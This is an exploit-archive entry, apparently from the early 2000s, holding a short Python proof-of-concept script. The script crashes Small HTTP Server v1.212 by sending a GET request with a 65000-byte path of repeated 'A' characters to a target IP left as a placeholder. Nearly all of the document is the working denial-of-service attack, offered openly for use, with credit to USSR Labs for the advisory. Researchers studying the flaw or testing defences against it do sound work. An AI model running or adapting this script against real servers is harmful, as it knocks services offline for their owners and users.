Small HTTP Server v. 1.212 remote dos attack written in python. See USSR Advisory #47
11c239d025641221ada67a8d32f1ccac084f73043f688e12cde0d50bb4474059
#!/usr/bin/python
#
# Small HTTP Server DoS Proof of Concept Code.
# Vulnerability Discovered by USSR Labs(https://www.ussrback.com)
# Simple Script by Prizm(Prizm@Resentment.org)
#
# By connecting to port 80(http) on a system running Small HTTP Server and issuing a GET
# command followed by 65000 bytes, the service will crash.
#
# This *simple* little script will cause http.exe to crash.
import httplib
h = httplib.HTTP('xxx.xxx.xxx.xxx') # Replace x's with IP.
h.putrequest('GET', 'A' * 65000)
#end